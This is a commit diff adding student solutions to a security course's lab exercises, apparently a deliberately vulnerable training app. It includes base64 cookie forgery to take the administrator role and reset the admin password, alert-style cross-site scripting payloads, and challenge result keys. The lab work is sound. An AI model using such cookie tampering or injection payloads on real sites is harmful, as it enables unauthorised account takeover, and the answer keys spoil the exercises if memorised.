all done except session management 4 and cross site scripting 3

c33a3f3a · Linus Roos · b0569d93 · c33a3f3a
Commit c33a3f3a authored 1 year ago by Linus Roos
--- a/TSIT02_Lab_Solutions.md
+++ b/TSIT02_Lab_Solutions.md
@@ -172,15 +172,15 @@ Try to log in as admin with some random password with zap active. The response w
 ## Session Management Challenge 3
 ### Solution
+Reset password and change cookie to dXNlclJvbGU9YWRtaW5pc3RyYXRvcg== like before, as well as changing the user cookie we are changing the password for. The user should be "admin" encoded twice in base64, like it is encoded originally: WVdSdGFXND0=. Change password to whatever and log in as admin.
 ### Result
+7593A069DFCEBB45C9F4323A5CEABCFC732253984E99471DF707AF8657610C212F9F3E03DA00BD3D1E24EDF44C08D20C153887479F571D56238DEE8A520588A6
 ## Session Management Challenge 4
 ### Solution
+checksum=dXNlclJvbGU9YWRtaW5pc3RyYXRvcg==; current=WVdSdGFXND0=;
 ### Result
@@ -188,18 +188,18 @@ Try to log in as admin with some random password with zap active. The response w
 ## Cross Site Scripting 1
 ### Solution
+Paste the img script from the lesson: ```<img src="#" onerror="alert('XSS')" />```
 ### Result
+7AF68765B063F61B2C0F3AF014913C4F356BB7455DD97C6F5C405A827C495E6F7BF12851D0FEC82670B3A419AAA60032D6091BD2F9507D0976E91190077F0C69
 ## Cross Site Scripting 2
 ### Solution
+Paste button script from lesson, but change to onmouseup instead of onclick: ```<input type="button" onmouseup="alert('XSS')"/>```
 ### Result
+085C94BD472557087E8B11BAE040A6CF83B62ECA5EC17623ECE12F5B115B0A3CD75A7B1D048CA538F446FC39FC93BC802898AC5BC743CC8BEF076F418D79D3C1
 ## Cross Site Scripting 3